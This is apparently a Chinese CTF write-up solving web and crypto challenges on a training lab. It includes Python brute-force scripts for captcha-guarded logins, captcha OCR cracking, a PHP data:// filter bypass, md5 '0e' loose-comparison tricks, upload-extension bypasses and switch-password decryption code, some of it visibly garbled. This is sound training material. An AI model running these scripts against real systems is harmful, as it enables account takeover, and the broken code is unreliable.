lpxU2pSV01WVjVVMnRrYWxORk5WZFpiRkpIVmtaU1YxZHNXbXhXTURReVZXMTRhMVJzV25WUm
FscFlWa1ZLYUZacVJtdFNNV1IxVkd4U2FFMXRhRzlXVjNSWFdWZE9jMVp1UmxSaE0xSlZWbTE
0UzAxR2JGWlhhemxYVFZad1NGWXljRXRXTWtwSVZHcFNWV0V5VWxOYVZscGhZMnh3UjFwR2FG
Tk5NbWcxVm14a2QxUXhWWGxUV0docFUwVTFXRmx0TVZOWFJsSlhWMjVrVGxKdGRETlhhMVpyV
jBaSmQyTkZhRnBOUm5CMlZqSnplRk5HVm5WWGJHUk9ZbTFvYjFacVFtRldNazV6WTBWb1UySk
hVbGhVVmxaM1ZXeGFjMVZyVG1oTlZXdzBWVEZvYzFVeVJYbGhTRUpXWWxoTmVGa3dXbk5XVmt
aMVdrVTFhVkp1UVhkV1JscFRVVEZhY2sxV1drNVdSa3BZVm01d1YxWkdXbkZUYTFwc1ZteGFN
VlZ0ZUdGaFZrbDRVbGhrVjJKVVJUQlpla3BPWlVkT1JtRkdRbGRpVmtwVlYxZDBWMlF4WkhOW
GEyaHNVak5DVUZadGVITk9SbGw1VGxaT1YySlZjRWxaVlZwdlZqSkdjazVWT1ZWV2JIQm9Wak
JrVG1WdFJrZGhSazVwVW01Qk1sWXhXbGRaVjBWNFZXNU9XRmRIZUc5VmExWjNWMFpTVjFkdVp
HaFNiRmt5VlcxME1HRnJNVmRUYWtaWFZqTm9VRmxXV2twbFJrNTFXa1prYUdFd2NGaFdSbFpX
WlVaSmVGcElTbWhTTTFKVVZGVmFkMlJzV2tkYVNIQk9WakZhZWxZeGFITlVNVnB5VGxjNVZWW
nNXak5VVlZwaFYwVTFWbFJzWkU1aE0wSktWMVpXVjFVeFdsaFRiR3hvVWpKb1dGbHJXbmRWUm
xwelYydDBhazFXY0hsVWJGcHJZVmRGZDFkWWNGZGlXR2h4V2tSQmVGWXhVbGxoUm1ob1RXMW9
WbGRYZEd0aU1rbDRWbTVHVW1KVldsaFphMXAzVFVad1ZtRkhkRlZoZWtaYVZWZDRjMWxXV2xo
aFJYaGFZVEZ3WVZwVldtdGpiVTVIWVVkb1RsZEZTbEpXYlRGM1V6RktkRlpyYUZWaE1WcFlXV
3RrVTFaR1ZuTlhibVJzVm0xU1dsa3dWbXRXTWtwWFVtcE9WVlpzV25wWlZscEtaVmRHUjFWc2
NHbFNNbWd5Vm1wR1lXRXhaRWhXYTJoUVZtdHdUMVpzVWtaTlJtUlZVVzFHV2xac2JEUlhhMVp
2WVVaS2MxTnNXbGRpVkVaVVZtdGFkMWRIVmtsVWJHUnBVakZLTmxaclkzaGlNVmw1VWxod1Vs
ZEhhRmhXYlRGU1RVWndSVkpzY0d4V2F6VjZXV3RhWVdGV1NYbGhSemxYVmpOU1dGZFdaRTlqT
VZwMVVteFNhRTB4U2xaV2JURjZUVlV4UjFadVVteFNWR3h3VldwQ2QxZHNiRlpWYkU1WFRVUk
dXVlpXYUd0WFJscDBWV3hPWVZac2NHaFpNbmgzVWpGd1IyRkdUazVOYldjeFZtMTRhMlF4Ulh
oaVJtaFZZVEpTV0ZsdGVFdGpNVlYzV2taT2FrMVhlSGxXTWpWUFZERmFkVkZzWkZwV1YxRjNW
akJhUzJOdFNrVlViR1JwVjBWS1ZWWnFTbnBsUmtsNFZHNU9VbUpIVWs5WlYzUmhVMFprYzFkd
FJsZE5helY2V1RCV2IxVXlTa2hWYXpsVlZucEdkbFV5ZUZwbFJsWnlZMGQ0VTJGNlJUQldWRV
p2WWpKR2MxTnNhRlppVjJoWFdXdGFTMWRHV2tWU2JHUnFUV3RhUjFaSGVGTlViRnAxVVZoa1Y
xSnNjRlJWVkVaaFkyc3hWMWRyTlZkU2EzQlpWMWQwYTJJeVVuTlhXR1JZWWxoU1ZWVnFRbUZU
Vm14V1YyMUdWV0pGY0RGVlZ6QTFWakpLVlZKVVFscGxhM0JRV1hwR2QxTldUblJrUms1T1RVV
ndWbFl4WkRCaU1VVjNUbFZrV0dKcmNHRlVWRXBUVlVaYWRHVklUazlTYkd3MVZHeFZOV0ZIU2
taalJteGFWbFp3ZWxacVNrWmxSbHBaWVVkR1UwMHlhRFpXYlhCSFdWWmtXRkpyWkdoU2F6Vnd
WVzAxUWsxc1dYaFhiR1JhVmpCV05GWlhOVTlYUm1SSVpVYzVWbUV4V2pOV01GcFRWakZrZFZw
SGFGTmlSbXQ1VmxjeE1FMUhSbkpOVm1SVVlXdGFXRlpxVG05U1JscHhVMnQwVTAxck5VaFphM
XB2VmpBd2VGTnFTbGRXYkVwSVZsUkdXbVZIVGtaaVJsWnBVakpvZDFadGVHRmtNV1JIVjJ0a1
dHSlZXbkZVVlZKWFUwWlplR0ZJVGxWTlZuQjVWR3hqTlZaV1duTlhibkJWWWtad2VsWnRNVWR
TYkZKeldrZHNWMWRGU2t0V01WcFhWakZWZUZkWVpFNVdiVkp4VldwS2IxbFdVbGRYYm1SV1Vt
MTBORll5ZUd0aGF6RllWVzVzVldKR2NISldSM2hoVjBkUmVtTkdaR2xYUjJoVlZsaHdRbVZHV
GtkVWJHeHBVbXMxYjFSWGVFdFdiR1JZVFZod1RsWnNjRmhaYTJoTFdWWktObUpHYUZwaE1YQX
pXbGQ0V21WVk5WaGtSbFpvWld0YVdsZHNWbUZoTVZsM1RWaEdWMkpyY0ZoV2ExWjNWRVpWZUZ
kclpHcGlWVnBJVjJ0YVQxUnJNWFJoUmxwWFlsUkdNMVY2Ums1bFZsSjFWR3hXYVdFelFuWldW
ekI0VlRGYVIxVnNWbFJpVkd4d1ZGWmFkMlZXV2xoa1JFSldUVVJHV1ZaWGRHOVdhekYxWVVod
1dGWnNjRXRhVjNoSFl6RldjMXBIYUdobGJGbDVWbTF3UjFsWFJYaGFSV2hYWVRKb1VWWnRkSG
RVTVZwMFpFaGtWRlp0VWxaVlZ6RkhZVlV4Y2xkcVFsZGlWRlpNVmpCa1MxTkhWa2RhUm5CcFV
qSm9WVlpHVWtka01WbDRXa2hTYTFJelFuQlZha1pLWkRGYVJWSnRkR2xOVm13elZGWldhMkZG
TUhsbFJtaGFZa1pLUTFwVlduTmpWa3B6WTBkNFUySldTalZXYWtvMFZUSkdXRk5yYkZKaVIya
FlXV3hvVTFkR1pGZGFSbVJxVFZkU01WVnRlRTloVmtsNFUyNW9WMUpzY0hKV1ZFcFhZekpLUj
FkdFJsUlNWRloyVm0weE5HUXlWbGRoTTJSV1lsVmFXRlJWVWtkWFZscFhZVWQwV0ZKc2NEQld
WM2hQV1ZaYWMyTkhhRnBOYm1nelZXcEdkMUl5UmtkVWF6Vk9ZbGRqZUZadE1UUmhNREZIVjFo
b1ZWZEhhR2hWYkdSVFZqRnNjbHBHVGxoV2JYZ3dWRlphVDJGck1WZGpSRUpoVmxkb1VGWkVSb
UZrVmtaeldrWndWMVl4UmpOV2FrSmhVMjFSZVZScldtaFNia0pQVlcwMVEwMXNXbkZUYm5Cc1
VtczFTVlZ0ZEdGaVJrcDBWV3M1V21KVVJuWlpha1poWTFaR2RGSnNaRTVoZWxZMlYxUkNWMkl
4VlhsVGEyaFdZa2RvVmxadGVHRk5NVnBZWlVkR2FrMVdXbmxXUjNocllVZFdjMWRzYkZkaGEx
cDJXV3BLUjJNeFRuTmhSMmhUWlcxNFdGZFdaREJrTWxKelYydFdVMkpHY0hKVVZscDNaVlp3U
mxaVVJtaFdhM0F4VlZab2ExZEhTa2RYYmtaVllrZFNSMXBFUVhoV01XUnlUbFprVTJFelFscF
diVEIzWlVkSmVWVnVUbGhYUjFKWldXeG9VMVpXVm5GUmJVWlVZa1phTUZwVlpFZGhSbHB5WWt
SU1ZtSkhhSEpXYWtwTFZsWktWVkZzY0d4aE0wSlFWMnhXWVdFeVVsZFdiazVWWWxkNFZGUldW
bmRXYkZsNFdrUkNWMDFzUmpSWGEyaFBWMGRGZVdGSVRsWmhhelZFVmxWYVlXUkZNVmRVYkZKV
FlrZDNNVlpIZUZaT1YwWklVMnRhYWxKRlNtaFdiR1JUVTBaYWMxZHRSbGROYXpWSVYydGFWMV
l5U2tsUmFscFhZbGhDU0ZkV1dtdFhSa3B5WVVkd1UwMXVhRmxXYWtKWFV6Rk9SMWR1VW14U00
xSlFWV3BDVjA1R1dsaE9WazVXVFd0d2VWUnNXbk5YYlVWNFkwZG9WMDFXY0doYVJWVjRWakZP
Y2s1V1RtbFNiWFExVm14amQyVkdTWGxTYmxKVFlXeHdXRmxyWkc5WlZteFZVbTVrVlZKdGVGa
FdNblF3WVdzeGNrNVZhRnBoTVhCMlZtcEJkMlZHVG5SUFZtaG9UVlZ3U1ZkV1VrZFhiVlpIWT
BWc1ZHSlhhRlJVVkVaTFZsWmFSMVp0Um10TlYxSllWakowYTFsV1RrbFJiazVXWWtaS1dGWXd
XbUZrUlRWWFZHMW9UbFpYT0hsWFYzUmhZVEZhZEZOc2JHaFRTRUpXV1d0YWQyVnNXblJOVldS
VFlrWktlbGRyWkhOV01XUkdVMnQwVjAxV2NGaFdha1pXWlVaa1dWcEZOVmRpVmtwNFZsZHdTM
kl4YkZkVmJHUllZbTFTVjFWdE1UQk9SbGw1WlVkMGFHRjZSbGxXVnpWelZsZEtSMk5JU2xkU0
0yaG9WakJrVW1WdFRrZGFSMnhZVWpKb1ZsWnNhSGRSYlZaSFZHdGtWR0pIZUc5VmFrSmhWa1p
hY1ZOdE9WZGlSMUpaV2tWa01HRlZNWEppUkZKWFlsUldWRlpIZUdGT2JVcElVbXhrYVZkSFoz
cFhiRnBoV1ZkU1JrMVdXbUZTYkZwdldsZDBZVmRzWkhOV2JVWm9UVlpzTTFSV2FFZFdNa3B5W
TBab1YyRXhXak5XUlZwV1pVWmtjbHBIY0dsV1ZuQkpWakowWVZReFVuSk5XRkpvVW14d1dGbH
NVa2ROTVZZMlVtczFiRlpzU2pGV1IzaFhZVmRGZWxGdWFGZFdla0kwV1dwS1QxSXhXblZWYlh
oVVVqRktkMVpHV210Vk1XUkhWMnhvYTFKRlNsZFVWVkpIVjBac2NsVnNUbGROVld3MldWVm9k
MWRzV1hwaFJYaGhVbXh3U0ZreWN6VldNVnB6V2tkNGFFMVhPVFZXYlRGM1VqRnNWMkpHWkZSW
FIyaHdWV3RhZDFaR2JITmFSRkpWVFZad2VGVnRkREJXUmxwelkwaG9WazFXU2toV1ZFRjRWak
ZhY1Zac1drNWliRXB2VjFaa05GUXhTbkpPVm1SaFVtNUNjRlZ0ZEhkVFZscDBaRWRHV0dKV1d
sbFdiWFJ2WVRGSmVsRnVRbFppVkZaRVZtcEdZVmRGTVZWVmJXeE9WbXhaTVZaWGVHOWtNVlow
VTJ4YVdHSkhhRmhaYkZKSFZURlNWbGR1VGs5aVJYQXdXa1ZhVDFSc1dYaFRXR2hYWWtkUk1GZ
FdaRWRUUms1eVlrWkthVkl4U2xsWFYzaFRVbXN4UjJORlZsUmlSMUp4VkZaa1UwMVdWblJsUl
Rsb1ZtdHNORlV5Tlc5V01VcHpZMGhLVjFaRmNGaFpla3BMVWpGa2RGSnNVbE5XUmxveVZtMHd
lRTVIVVhsV2JHUm9UVEpTV1ZsdE1WTlhSbEpZWkVoa1ZGWnNjRWxaTUZwUFZqRlpkMVpxVmxk
V00yaFFWMVphWVdNeVRraGhSbkJPWW0xbmVsWlhjRWRrTVU1SVUydG9hVkpyTlZsVmJGWjNWV
EZhZEUxSVpHeFNWRlpKVld4b2IxWXhaRWhoUjJoV1lrZFNWRlpxUm5OamJHUjFXa1prVGxZem
FGZFdWRW8wVkRKR2NrMVdaR3BTUlVwb1ZteGFXbVF4YkhKYVJYUlRUV3MxUmxWWGVGZFdNVnB
5WTBac1YySllRa05hVlZwTFZqRk9kVlJ0UmxOaWEwcDNWMWN4TUZNeFVsZFhibEpPVTBkb1ZW
UldaRk5YUmxwMFRsWmtXRkl3Y0VsV1Z6QTFWMnhhUmxkcVRscGhhMXBvVmpCVmVGWldWblJoU
lRWb1pXeFdNMVp0TUhoTlIwVjRZa1prVkZkSGVHOVZibkJ6Vm14YWNsWnJkRlZTYkhCWldsVm
tSMkZyTVZoa1JGcGFWbFpWTVZaVVNrdFhWMFpIWTBaa2FFMVlRakpYVjNCTFVqSk5lRlJ1VG1
oU01taFZWV3hXZDFkR1pGaGxSemxWWWxaYVNGWXlkRmRWTWtwV1YyNUdWVlp0VWxSYVYzaHla
REZ3UlZWdGFGZGhNMEY0VmxaYWIyRXhaRWhUYTJSWVltdHdWMWxYZEdGaFJtdDVZek5vVjAxW
FVqQlphMXBQVlRKRmVsRnRPVmROVm5CVVZXcEtVbVZXVW5WVWJHaFlVakZLYjFaWGVHOVZNaz
VYWWtoT1YxWkZXbFJVVmxwSFRrWlplVTFVUW1oU2JIQXdWbGQwYzFkSFJuSk9WRTVYWVd0d1N
Ga3llRTlrUjBaSFkwZDRhRTFZUWpWV2JYQkRXVlpWZVZSdVRtcFNWMmhVV1d0Vk1XTkdXblJr
U0dSWFlrWnNORmRyVWtOWGJGbDRVbXBPVldKR2NISldNR1JMWXpGT2NrOVdaR2hOVm5CTlZqR
mFZVmxYVWtoV2ExcGhVbFJzVkZscmFFSmtNV1J6Vm0xR2FFMVdjRmxWTW5SaFlXeEtXR1ZIUm
xWV1JUVkVXbFphVjFJeFNsVmlSa1pXVmtSQk5RPT0=
(末尾有换行,自行去除)
…好长的base64密文…不知道加密了多少次,写个python跑一跑呗~
import base64
fp=open('1.txt','r')
a=fp.read()
a=base64.b64decode(a)
4.据说MD5加密很安全,真的是么?
ed7b8e24633
既然是MD5加密,丢到某网站解一下~结果为
5.种族歧视
小明同学今天访问了一个网站,竟然不允许中国人访问!太坑了,于是小明同学决心一定要进去一探究竟!
打开之后看见”only for Foreigner”.不允许中国人访问的话,假装是外国人就行啦~
默默掏出 burpsuite,改一下Accept-Language为en,Go~
顺便安利一个网站(
6.HAHA浏览器
据说信息安全小组最近出了一款新的浏览器,叫HAHA浏览器,有些题目必须通过HAHA浏览器才能答对。小明同学坚决不要装HAHA浏览器,怕有后门,但是如何才能过这个需要安装HAHA浏览器才能过的题目呢?
打开,显示”只允许使用HAHA浏览器,请下载HAHA浏览器访问!”
那改一下User-Agent就行啦~默默掏出burpsuite.
7.key究竟在哪里呢?
上一次小明同学轻松找到了key,感觉这么简单的题目多无聊,于是有了找key的加强版,那么key这次会藏在哪里呢?
先看源代码,并没有.用firebug抓个包看看呗~
8.key又找不到了
小明这次可真找不到key去哪里了,你能帮他找到key吗?
打开,显示”到这里找key_“,再点~显示”key is not here!”…
两个网页源码都没发现东西,抓个包看看呗
第一个没抓到啥
第二个就有了
打开这个网址就可以看到key啦~
9.冒充登陆用户
小明来到一个网站,还是想要key,但是却怎么都登陆不了,你能帮他登陆吗?
打开,显示”您还没有登陆呢!”.源代码也没线索.抓个包看看呗~
改为1就行啦~
10.比较数字大小
只要比服务器上的数字大就可以了!
输入框限制输入3位数字,那么只要post的数字大一些应该就行了吧?默默掏出brupsuite.
11.本地的诱惑
小明扫描了他心爱的小红的电脑,发现开放了一个80端口,但是当小明去访问的时候却发现只允许从本地访问,可他心爱的小红不敢让这个诡异的小明触碰她的电脑,可小明真的想知道小红电脑的80端口到底隐藏着什么秘密(key)?
打开看源码…key居然就这么出现了……
“//SAE 服务调整,该题目无法继续…可尝试自行搭建环境测试.”
12.就不让你访问
小明设计了一个网站,因为总是遭受黑客攻击后台,所以这次他把后台放到了一个无论是什么人都找不到的地方….可最后还是被黑客找到了,并被放置了一个黑页,写到:find you ,no more than 3 secs!
“I am index.php , I am not the admin page ,key is in admin page.”
源码,抓包都没有线索.访问admin.php之类的也没结果,最后尝试了一下robots.txt,
“Disallow: /9fb903aff7e794ab2f5f/”
“you find me,but I am not the login page. keep search.”
那就补上login.php咯~
“right! key is XXXX”
这种题线索太少,只能把能试的都试一遍
1.key又又找不到了
小明这次哭了,key又找不到了!!! key啊,你究竟藏到了哪里,为什么我看到的页面上都没有啊!!!!!!
“到这里找key_”
“想找key,从哪里来回哪里去,我这里没有key!哼! “
href="./search_key.php"&_到这里找key__&
认真比对就能发现,之前直接点击后显示的网址是”/no_key_is_here_forever.php”不是这个
点进去看看呗~
“key is : XXXX”
key就这么出现了~
2.快速口算
小明要参加一个高技能比赛,要求每个人都要能够快速口算四则运算,2秒钟之内就能够得到结果,但是小明就是一个小学生没有经过特殊的培训,那小明能否通过快速口算测验呢?
2s之内要提交
这种运算…..那我表示我也是小学生…
还是python大法好
import requests,re
s = requests.Session()
url = 'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749bbe1/index.php'
html = s.get(url).content
reg = r'([0-9].+)=&'
pattern = re.compile(reg)
match = re.findall(pattern,html)
payload = {'v': eval(match[0])}
print s.post(url, data=payload).content
3.这个题目是空的
Tips:这个题目真不是随便设置的。 什么才是空的呢? 通关地址:没有,请直接提交答案(小写即可)
空~用来表示空白的字符串可能为:%00,%0a,%0d,%0a%0d,%0b,%0c,%a0,null,none等,慢慢试吧~
4.怎么就是不弹出key呢?
提交说明:提交前14个字符即可过关
JS题,默默跳过~
5.逗比验证码第一期
逗比的验证码,有没有难道不一样吗?
验证码正常情况下都是一提交就变的.由题目的意思看来这题的验证码提交一次后不会改变.抓个包看看是不是.
验证码得填对,然后密码随便写一个看看.提交之后出现”pwd error”.
那改一下pwd再次提交看是会出现”pwd error”还是”vcode error”.
还是”pwd error”.说明验证码确实没更改.
那就好办了,密码是4位纯数字,验证码不会改,那么我们用brupsuite爆破密码就行了(python也可以)
长度最大的当然就是想要的结果啦~
python我也写了一个
import requests
s = requests.Session()
url = 'http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php'
header = {'Cookie': 'PHPSESSID=e3eaa75fca7edf7798fe'}
for pwd in xrange(1000,10000):
payload = {'username': 'admin', 'pwd':pwd ,'vcode': '4hrk'}
r = s.post(url, data=payload,headers=header)
print pwd,r.content
6.逗比验证码第二期
验证便失效的验证码
题目说”验证便失效的验证码”..那就验证后看看,第一次提交
再来一次看看
变为”vcode error”了…说好的验证便失效呢…那不提交验证码看会怎么样
原来是这么个失效法…burpsuite继续爆破
python也行
import requests
s = requests.Session()
url = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php'
header = {'Cookie': 'PHPSESSID=e3eaa75fca7edf7798fe'}
payload = {'username': 'admin', 'pwd':1000 ,'vcode': 'rfj8'}
r = s.post(url, data=payload,headers=header)
print 1000,r.content
for pwd in xrange(1001,9999):
payload = {'username': 'admin', 'pwd':pwd ,'vcode': ''}
r = s.post(url, data=payload,headers=header)
print pwd,r.content
7.逗比的验证码第三期(SESSION)
尼玛,验证码怎么可以这样逗比。。
验证码做成这样,你家里人知道吗?
这题用第6题的方法也可以解出来…连代码都不用怎么改…
8.微笑一下就能过关了
尼玛,碰到这样的题我能笑得出来嘛…
href="?view-source"&源代码&&
打开连接可以看到
header("Content-type: text/ charset=utf-8");
if (isset($_GET['view-source'])) {
show_source(__FILE__);
include('flag.php');
$smile = 1;
if (!isset ($_GET['^_^'])) $smile = 0;
if (preg_match ('/\./', $_GET['^_^'])) $smile = 0;
if (preg_match ('/%/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/[0-9]/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/http/', $_GET['^_^']) ) $smile = 0;
if (preg_match ('/https/', $_GET['^_^']) ) $smile = 0;
if (preg_match ('/ftp/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/telnet/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/_/', $_SERVER['QUERY_STRING'])) $smile = 0;
if ($smile) {
if (@file_exists ($_GET['^_^'])) $smile = 0;
if ($smile) {
$smile = @file_get_contents ($_GET['^_^']);
if ($smile === "(●'?'●)") die($flag);
很明显,为了输出flag,需要满足上面的所有条件,即:
1.必须对"^_^"赋值
2."^_^"的值不能有
3.$_SERVER['QUERY_STRING'],即"^_^=(输入的值)"这个字符串不能有 _ 这个字符
4.满足$smile!=0
5.file_exists ($_GET['^_^'])必须为0.也就是$_GET['^_^']此文件不存在
6."$smile"必须等于"(●'?'●)".也就是file_get_contents($_GET['^_^'])必须为"(●'?'●)"
仔细分析可以发现,第3点与第1点矛盾了,既要对"^_^"赋值,又得想办法去掉"^_^"中的"_",那么可以采用Url编码变为"%5f".这样第3点就满足了.所以我们输入就应该为
"^%5f^".继续分析第2点,这个地方把
这些给过滤了,而第6点又要通过file_get_contents()取出$_GET['^_^']里的值.而根据第5点,$_GET['^_^']又必须不存在.所以$_GET['^_^']只能是字符串"(●'?'●)",不可能是文件名.那么file_get_contents()里的参数应该是啥呢.查了一下,发现data://完美符合.所以我们输入就应该为"^%5f^=data:,(●'?'●)"
http://lab1.xseclab.com/base13_ead1b12e47ec7ccb779d47/index.php?^%5f^=data:,(●'?'●)
就能看到key啦~
源代码里是”T_T”哦,所以直接输入肯定是不行的~必须直接构造url打开~
&input type="text" name="T_T" placeholder="where is your smile" required&
9.逗比的手机验证码
你的手机号码是,验证码将会以弹窗的形式给出
点击获取手机验证码,输入提交,出现
“please login as ”
返回再次点击获取手机验证码,输入提交,出现
随便输入vcode提交看看
“no vcode!”
居然是no vcode..应该是vcode error才对…
再看看前面的步骤
之前说”login as ”,按道理验证码是发到上的,那么登录的时候验证码肯定不是之前登录的验证码了.这是正常情况下的.那这题试试看是不是同一个.
点击获取验证码()-&获得”9382”-&输入,输入9382-&提交
key就出来啦~
10.基情燃烧的岁月
Tips:你是一名黑客,你怀疑你的“(男/女)闺蜜”的出轨了,你要登陆TA手机的网上营业厅查看详单,一探究竟! 闺蜜手机号码:
点击获取手机验证码,弹出
“手机验证码是:验证码发到手机上了,你看不到..是3位纯数字,开头不为0”
vcode是3位纯数字,开头不为0,都这么说了,估计就是要去爆破了
.那继续爆破咯…
11.验证码识别
验证码识别
Tips:验证码依然是3位数
题目意思就是爆破手机验证码,而每次提交后,图片验证码都会改变.爆破好说,至于验证码识别….python大法好
from pytesser import *
import requests
cur_path = os.getcwd()
vcode_path = os.path.join(cur_path, 'vcode.png')
header = {'Cookie': 'PHPSESSID=78e8ff33facb1'}
def vcode():
pic_url = 'http://lab1.xseclab.com/vcode7_f33dbc85dda4f/vcode.php'
r = requests.get(pic_url, headers=header)
with open(vcode_path, 'wb') as pic:
pic.write(r.content)
im=Image.open('vcode.png')
text=image_to_string(im)
v=text[0:4].replace('O','0').replace('o','0').replace('l','1')
if len(v)==4 and v.isdigit():
url = 'http://lab1.xseclab.com/vcode7_f33dbc85dda4f/login.php'
for i in range(100, 1000):
code = vcode()
data = {'username': '', 'mobi_code': str(i), 'user_code': code}
r = requests.post(url, data=data, headers=header, timeout=10)
print 'm_vode=%s
u_vcode=%s
%s' %(i,code,r.content)
验证码识别难免会有出错的地方,我加了一些判断的地方尽量保证识别是对的..然而脸黑的话还是得跑上几次
又发现了一个工具
差不多就是brupsuite+验证码识别~
12.XSS基础关
XSS基础:很容易就可以过关.XSS类题目必须在平台登录才能进行.登录地址请参考左侧&子系统&
XSS还不太会,跳~
13.XSS基础2:简单绕过
很容易就可以过关.
XSS还不太会,跳~
14.XSS基础3:检测与构造
XSS基础3:检测与构造
Tips:不是很难
XSS还不太会,跳~
15.Principle很重要的XSS
原理/原则/理念很重要…..不是所有的xss都叫特仑苏.. ^_^
Take it easy!
XSS还不太会,跳~
注入正在学,先留着以后填坑~
1.请上传一张jpg格式的图片
只能上传jpg格式的图片哦~!
上传就传呗~
“恩,真乖,您上传了一张jpg格式的图片”
…..看源码
action="upload_file.php" method="post" enctype="multipart/form-data" onsubmit="return check()"&
所以点进去
key就这么出来了…
2.请上传一张jpg格式的图片
只能是jpg哦!
“真乖,您上传了一张jpeg的图片,上传成功!”
看源码,还是点进去看看
“上传文件类型错误!”
抓个包看看…
先使用.jpg上传,然后抓包把文件后缀改了
3.请上传一张jpg格式的图片
只能是jpg哦!
试了一下,前面2题的方法都不行了
js代码一直没看,认真看了一下(虽然只能看点大意),发现js通过 . 分割上传的文件名,取 . 后面的字符串为扩展名来验证.那要是我们传的文件名是XX.jpg.txt呢,显然也是可以通过验证的.试一试咯
果然,key到手~
1.以管理员身份登录系统
以管理员身份登录即可获取通关密码(重置即可,无需登录)
补充说明:假设除了admin用户,其它用户的邮箱都可被登录获取重置密码的链接。
点忘记密码进去重置的时候,如果是非admin,就可以重置成功.要是是admin就不行.
尝试抓包看看
可以看到,右侧并没有返回啥东西.
又注意到有个sukey,看起来是md5,解一下看看
再试了几组,发现就后3位在变动,而且一直在增长,看起来很像时间戳.
试一下看看
以后再来填坑
2.邂逅对门的妹纸
小明想要认识对门的漂亮妹纸,但又不好意思直接去敲门,但是小明知道妹纸今年(2014年)上大三(提交wifi密码的md5 32位小写)
2014 年上大三,那就是出生在 1994 .用python写个41231的字典,用EWSA 爆破
fp=open('pass.txt', 'w')
for mon in range(1, 13):
for day in range(1, 32):
fp.write('%d%02d%02d\n' % (year, mon, day))
fp.close()
3.万恶的Cisco
小明入侵了某企业内网,成功的从一管理员电脑获取了某型号交换机running-config文件,发现以下密码
F1C181C0C140D0A0A20253A3B
请你帮他破解该密码。
搜了一下,发现是Cisco密码
找到了一个网站,直接解~
那个网站(““)
4.万恶的加密
这次小明通过某漏洞获取到了某huawei/h3c交换机的加密密码,请你帮他破解。
aK9Q4I)J’#[Q=^Q`MAF4&1!!
没啥思路..看见”某huawei/h3c交换机”,搜之,发现一个代码.我小小地改了一下
import sys, os
from Crypto.Cipher import DES
def decode_char(c):
if c == 'a':
return ord(r) - ord('!')
def ascii_to_binary(s):
assert len(s) == 24
out = [0] * 18
for i in range(0, len(s), 4):
y = decode_char(s[i + 0])
y = (y && 6) & 0xffffff
k = decode_char(s[i + 1])
y = (y | k) & 0xffffff
y = (y && 6) & 0xffffff
k = decode_char(s[i + 2])
y = (y | k) & 0xffffff
y = (y && 6) & 0xffffff
k = decode_char(s[i + 3])
y = (y | k) & 0xffffff
out[j + 2] = chr(y & 0xff)
out[j + 1] = chr((y && 8) & 0xff)
out[j + 0] = chr((y && 16) & 0xff)
return "".join(out)
def decrypt_password(p):
r = ascii_to_binary(p)
r = r[:16]
d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB)
r = d.decrypt(r)
return r.rstrip("\x00")
print decrypt_password(raw_input('输入密文\n'))
5.喜欢泡网吧的小明
小明特别喜欢泡网吧,而这个月小明拿到了他第一个月的薪水,于是这次到了他平时最常去的网吧充了100元办理了一张会员卡,于是乎小明再也不用花钱上网了。
不会哇….T_T
6.异常数据
小明今天去妹纸家开Party,而妹纸却给他出了一个谜语,说只要他能答出来,她就会答应小明一个要求.
这是妹纸给小明的谜语序列:AGV5IULSB3ZLVSE=
Tips:key就是解密结果
最后有个等号,很明显是base64,可是也不会都是大写字母吧.试一下爆破大小写~
import base64,re
from itertools import combinations
s=list('AGV5IULSB3ZLVSE=')
for i in range(len(s)):
for j in list(combinations([x for x in range(len(s))], i)):
for k in j:
a[k]= a[k].lower()
r=repr(base64.b64decode(''.join(a)))
if '\\x' not in r:
print r[1:-1]
7.md5真的能碰撞嘛?
md5真的能碰撞嘛?其实有时候我们不需要进行碰撞得到完全一致的MD5
打开后有个小小的链接.点击看看
$flag=FLAG;
if(isset($_POST["password"])){
$password=$_POST['password'];
$rootadmin="!!";
if($password==$rootadmin){die("Please do not attack admin account!");}
if(md5($password)==md5($rootadmin)){
echo $flag;
die("Password Error!");
代码的意思就是我们需要post password,令它不等于!!,且password的值经过md5加密后还得和!!经过md5加密过值”==”.
可以看到,md5值是0e开头的.考查的应该是php的”==”类型强转隐患.所以我们只要让post的值经过md5加密后开头也是0e就行了,符合这个特性的字符串有很多.比如””.
8.小明爱上了一个搞硬件的小姑凉
小明爱上了一个搞嵌入式开发的小姑凉,于是特别想通过一种与众不同的方式向她表白,于是他在她的电脑桌面放了一个文件.
Tips: 该文件为某逻辑分析仪抓包数据,请分析其中的内容,过关密钥为抓包数据内容的小写.
嵌入式开发,不会
9.有签名限制的读取任意文件
我们一直认为,只要消息签名了,salt不泄露且无法猜解到,即便是算法使用公开的加密算法,那么黑客也无法篡改信息.可是真的是这样嘛?
Tips: MD5 Length Extension Attack!
Tips: 除已经告知的/etc/hosts文件外,若能读取到任意系统文件即可获取Flag.
Info: 增加密钥长度为32位
没思路,跳~
1.渗透测试第一期
注意:该题目模拟真实环境,故具有排他性,请选择合适的时间段完成该题。 你只有一部可用手机,手机号码会在需要手机号码的页面中给出。
现在用户不用排他了,只要保证在一个session里即可。
先按注册,绑定,登录的过程走一遍,最后显示
那就是要用管理员账号登录啦.而管理员账号密码都不知道.管理员账号倒是可以猜一猜,什么”admin”,”Admin”,”administrator”之类的.网站上有个” Forget Password?”可以重置密码,那么我们可以尝试用给出的的手机号重置admin密码.提示”输入的手机号码不正确”.那么admin的手机号要怎么获取呢.绑定手机的时候我们可以抓包改一下用户为admin
现在就可以重置admin的密码了,并用重置后的密码登录看看
key就出来了
2.没有注入到底能不能绕过登录
不是SQL注入
随便输些,登录提示”error”.看了一下robots.txt,发现”Disallow: /myadminroot/”
打开看看”Please login first!”所以先登录,再访问/myadminroot.写个python咯
import requests
r = requests.Session()
url = 'http://lab1.xseclab.com/pentest3_307c1d54885a/'
data = {'username': '1', 'password': '1'}
r.post(url, data=data)
url2 = 'http://lab1.xseclab.com/pentest3_307c1d54885a/myadminroot/'
print r.get(url2).content
结果是”please login as admin!”.那把username的值改为admin再来一次
其他的题目都不会啦,就先写到这吧~
没有更多推荐了,

我要回帖

更多关于 高考成绩账号密码忘了 的文章

 

随机推荐